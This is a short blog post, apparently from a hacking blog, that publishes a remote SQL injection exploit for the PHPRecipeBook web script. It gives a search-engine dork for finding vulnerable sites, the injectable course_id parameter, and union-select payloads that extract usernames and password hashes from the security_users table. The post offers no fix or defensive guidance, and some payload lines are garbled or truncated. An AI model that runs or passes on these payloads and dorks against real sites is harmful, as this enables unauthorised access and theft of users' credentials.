Assalam-0-Alaikum,
AFter writing on the Series Article on MySQL injection Complete book .I HAVE DECIDED TO SHARE YOU some more stuff about it hope you will learn many things from it.
Script: PHPRecipeBook
Download: Here
Bugs: Remote SQL Injection Exploit
Dork: inurl: "/ index.php? M =" "PHPRecipeBook 2:39"
[- Bugs -]
(+)
/ Index.php? M = recipes & a = search & search = yes & course_id = [SQLEXP]
[- SQL EXPLOIT -]
Username exploit: -7 + union + select +1, user_login, 3,4,5,6,7 + from + hatches y_users -
Password exploit: -7 + union + select +1, user_password, 3,4,5,6,7 + from + secu rity_users -
Example
Username: http://www.xxx.org/recipes...curity_users--
Pass (hash): http://www.xxx.org/recipes...curity_users--
user:
/ Index.php? M = recipes & a = search & search = yes & course_id =- 7 + union + select +1, user_login, 3,4,5,6,7 + from + security_users -
password
/ Index.php? M = recipes & a = search & search = yes & course_id =- 7 + union + select +1, user_password, 3,4,5,6,7 + from + security_users -
End of this exploit.
Dont stop it and keep it on your brain lets share it and make others aware of this.
Regards,
Zulqurnain jutt
I am a pro-programmer of C++ ,php i can crack some softwares and am a web desighner .I AM also on
0 Comments :
Post a Comment
Having Confusion ,oH Dear ask me in comments!!